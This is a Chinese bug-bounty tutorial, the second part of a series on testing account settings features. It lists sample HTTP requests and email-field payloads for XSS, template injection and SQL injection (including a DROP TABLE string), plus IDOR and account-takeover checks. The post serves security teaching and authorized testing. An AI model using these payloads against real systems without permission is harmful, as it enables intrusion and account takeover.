漏洞赏金猎人系列-如何测试设置(Setting)功能II
声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。
正文
本文为本系列的第二弹,前篇有:
第八种方法
如果目标的业务系统中有增加第二个邮箱的功能,尝试用公司邮箱添加,比如: [email protected]
,从而获得额外权限,
POST /setting HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
[email protected]&action=add&token=CSRF
第九种方法
如果目标的业务系统中有增加第二个邮箱的功能,尝试用公司邮箱添加,比如: [email protected]@company.com
,从而获得额外权限,
POST /setting HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
[email protected]@company.com&action=add& token=CSRF
第十种方法
如果目标的业务系统中有增加第二个邮箱的功能,尝试用Burp Collaborator
邮箱地址,可能会获取后台敏感信息
[email protected]
user(;[email protected])@gmail.com
[email protected](@gmail.com)
me+(@gmail.com)@id.collaborator.net
<[email protected]>[email protected]
第十一种方法
如果目标的业务系统中有增加第二个邮箱的功能,尝试用以下的payload,可能会有xss,ssti,sqli在等着你发现
me+(<script>alert(0)</script>)@gmail.com
me(<script>alert(0)</script>)@gmail.com
me@gmail(<script>alert(0)</script>).com
"<script>alert(0)</script>"@gmail.com
"<%= 7 * 7 %>"@gmail.com
me+(${{7*7}})@gmail.com
"' OR 1=1 -- '"@gmail.com
"me); DROP TABLE users;--"@gmail.com
me@[id.collaborator.net]
%@gmail.com
第十二种方法
如果有基于UUID的编辑,尝试使用另一个帐户的UUID,看看是否有IDOR
POST /setting HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
[email protected]&uuid=Your-UUID&token=CSRF
第十三种方法
将邮箱从[email protected]更改为[email protected]时,确认验证码是否也发送到[email protected],如果是,这里有账户劫持漏洞
POST /setting HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
[email protected]&token=CSRF
第十四种方法
如果有基于手机号码的编辑功能,比如:修改密码,请尝试使用其他帐号的手机号码,测试是否有IDOR
POST /setting HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
newPass=****&phone=Phone-Another-Account&token=CSRF
参考
https://hackerone.com/reports/565883
https://nathandavison.com/blog/exploiting-email-address-parsing-with-aws-ses
HTML injection in e-mails is pretty common, but did you know you can escalate it to stored XSS in many cases? Just open the 'online version' to get that sweet pop-up! 😎 Thanks for the #BugBountyTip, @renniepak! #HackWithIntigriti pic.twitter.com/Qa3xoCBsGb
— INTIGRITI (@intigriti) October 20, 2020
https://medium.com/@dimazarno/bypassing-email-filter-which-leads-to-sql-injection-e57bcbfc6b17
https://hackerone.com/reports/95552
https://hackerone.com/reports/950881
https://hackerone.com/reports/969223
https://hackerone.com/reports/974222
https://hackerone.com/reports/791775
原文始发于微信公众号(迪哥讲事):漏洞赏金猎人系列-如何测试设置(Setting)功能II
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论